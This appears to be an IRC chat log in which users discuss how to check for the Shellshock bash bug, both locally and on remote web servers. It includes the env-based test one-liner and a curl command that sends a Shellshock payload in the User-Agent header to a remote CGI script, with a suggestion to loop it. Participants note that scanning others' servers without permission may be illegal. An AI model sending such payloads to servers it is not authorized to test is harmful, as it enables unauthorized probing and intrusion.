is there a shell based utility to test bash vulnerability of remote web servers? there's a command you can run to test it well, a number of them i guess env x='() { :;}; echo vulnerable' bash -c "echo this is a test" that's one mnathani: Since it varies by path (eg, I can't just open :443 and throw packets at it), to my knowledge no such utility is really useful mnathani: But you can throw it in a curl pretty easily, since that's all it takes something like curl -A "env x='() { :;}; echo vulnerable' bash -c \"echo this is a test\"" http://server/insecure.cgi throw that into a loop even up_the_irons: *bump* ticket (not that it's urgent, but want to make sure you've seen it) (yes I got the autoresponder, so I know it's been received) oh, i misinterpreted it - just assumed remote webservers meant boxes in your control with shell access env X="() { :;} ; echo shellshock" `which bash` -c "echo completed" this is what i use to test it if it says shellshock it's vulnerable oh that's basically the same as what you said Almost verbatim :P but basically all bash instances are vulnerable. testing on server is good enough don't need to test remote vulnerable update bash on *all* systems I think the scenario is that mnathani wants to be able to tell Google (for example) their server needs updating, hence the "of remote web servers" oh right Where "Google" is probably replaced by acquaintences, clients, sales prospects, etc that's probably illegal here i dunno what it's like there. Grey area, as all pen-testing tends to be without documents